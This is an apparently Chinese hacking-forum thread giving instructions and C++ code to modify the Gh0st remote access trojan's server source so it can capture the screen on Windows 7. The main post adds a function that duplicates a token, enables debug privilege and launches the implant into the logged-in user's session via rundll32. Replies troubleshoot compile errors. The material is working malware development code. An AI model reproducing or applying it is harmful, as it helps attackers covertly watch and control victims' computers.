HanDs
管理员

[Visual Studio文章] 让GHOST源码支持WIN7屏幕 



打开server的until.cpp文件.在最后面#endif的上面加上下列代码

    DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand )
    {
    DWORD dwRet = 0;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    DWORD dwSessionId;
    HANDLE hUserToken = NULL;
    HANDLE hUserTokenDup = NULL;
    HANDLE hPToken = NULL;
    HANDLE hProcess = NULL;
    DWORD dwCreationFlags;

    HMODULE hInstKernel32    = NULL;
    typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)();
    WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL;

    hInstKernel32 = LoadLibrary("Kernel32.dll");

    if (!hInstKernel32)
    {
    return FALSE;
    }

    WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId");

    // Log the client on to the local computer.
    dwSessionId = WTSGetActiveConsoleSessionId();

    do
    {
    WTSQueryUserToken( dwSessionId,&hUserToken );
    dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;
    ZeroMemory( &si, sizeof( STARTUPINFO ) );
    si.cb= sizeof( STARTUPINFO );
    si.lpDesktop = "winsta0\\default";
    ZeroMemory( &pi, sizeof(pi) );
    TOKEN_PRIVILEGES tp;
    LUID luid;

    if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
    | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID
    | TOKEN_READ | TOKEN_WRITE, &hPToken ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;
    tp.PrivilegeCount =1;
    tp.Privileges[0].Luid =luid;
    tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;

    if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    //Adjust Token privilege
    if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) )
    {
    dwRet = GetLastError();
    break;
    }
    else;

    LPVOID pEnv =NULL;

    DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL );
    CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary("UserEnv.dll"), "CreateEnvironmentBlock" );
    if (!CreateEnvironmentBlock) break;

    if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) )
    {
    dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;
    }
    else pEnv=NULL;

    // Launch the process in the client's logon session.
    if( CreateProcessAsUser(    hUserTokenDup,    // client's access token
    NULL,        // file to execute
    lpCommand,        // command line
    NULL,            // pointer to process SECURITY_ATTRIBUTES
    NULL,            // pointer to thread SECURITY_ATTRIBUTES
    FALSE,            // handles are not inheritable
    dwCreationFlags,// creation flags
    pEnv,          // pointer to new environment block
    NULL,          // name of current directory
    &si,            // pointer to STARTUPINFO structure
    &pi            // receives information about new process
    ) )
    {
    }
    else
    {
    dwRet = GetLastError();
    break;
    }
    }
    while( 0 );

    //Perform All the Close Handles task
    if( NULL != hUserToken )
    {
    CloseHandle( hUserToken );
    }
    else;

    if( NULL != hUserTokenDup)
    {
    CloseHandle( hUserTokenDup );
    }
    else;
    if( NULL != hPToken )
    {
    CloseHandle( hPToken );
    }
    else;
    return dwRet;
    }

然后打开until.h 同样在最后面的#endif上面加上

    DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );

然后打开svchost.cpp

搜索extern "C" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )

在上面加上

    extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow )

    {
    main(lpCmdLine);
    }

搜索g_dwServiceType = QueryServiceTypeFromRegedit(svcname);在下面加上

    HANDLE hThread = NULL;
    OSVERSIONINFO OsVerInfoEx;
    OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    GetVersionEx(&OsVerInfoEx);
    if ( OsVerInfoEx.dwMajorVersion < 6 )//判断那种系统,如果小于6,直接用原来的代码
    {
    HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
    }
    else
    {
    CHAR lpCommand[256];
    CHAR Start[MAX_PATH];
    GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));
    wsprintf(lpCommand,"rundll32.exe %s, XiaoDeBu %s",Start, svcname );
    LaunchAppIntoDifferentSession(lpCommand);
    }

然后把HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);这句注释掉.

 

按照楼主的处理方法处理了风狂的源码后
Compiling...
svchost.cpp
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(25) : error C2065: 'main' : undeclared identifier
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(38) : error C2373: 'main' : redefinition; different type modifiers
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(59) : error C2373: 'main' : redefinition; different type modifiers
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(258) : error C2039: 'g_hInstance' : is not a member of 'CKernelManager'
        C:\Users\MyDiyGh0st\Server\svchost\common/KernelManager.h(14) : see declaration of 'CKernelManager'
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(258) : error C2065: 'g_hInstance' : undeclared identifier
Error executing cl.exe.

Server.dll - 5 error(s), 0 warning(s)
QQ:542773581
回复 引用 使用道具 评分 举报 返回顶部
weixing

侠客

暗币847 AB 威望10 点 最后登录2013-4-18 注册时间2006-8-21
5#
发表于 2012-5-3 22:17 |只看该作者
回复 cainiao00abc 的帖子

GetModuleFileName(CKernelManager::g_hInstance,Start,sizeof(Start));
把这句改成
GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));
空气博客
回复 引用 使用道具 评分 举报 返回顶部
cainiao00abc

正式会员

暗币1021 AB 威望0 点 最后登录2013-5-5 注册时间2010-9-21
6#
发表于 2012-5-3 22:47 |只看该作者
谢谢
Compiling...
svchost.cpp
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(25) : error C2065: 'main' : undeclared identifier
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(38) : error C2373: 'main' : redefinition; different type modifiers
C:\Users\MyDiyGh0st\Server\svchost\svchost.cpp(59) : error C2373: 'main' : redefinition; different type modifiers
Error executing cl.exe.

Server.dll - 3 error(s), 0 warning(s)
第一个错定位到了
extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow )

{
    main(lpCmdLine);
}

第二个错地位到了
DWORD WINAPI main(char *lpServiceName);

第三个错定位到了
DWORD WINAPI main(char *lpServiceName)
#endif
{
#ifdef _CONSOLE
        if (argc < 3)
        {
                printf("Usage:\n %s <Host> <Port>\n", argv[0]);
                return -1;
        }
中的第一个 “{”

 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
GH OS T 源码 支持 W IN 7 屏幕
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复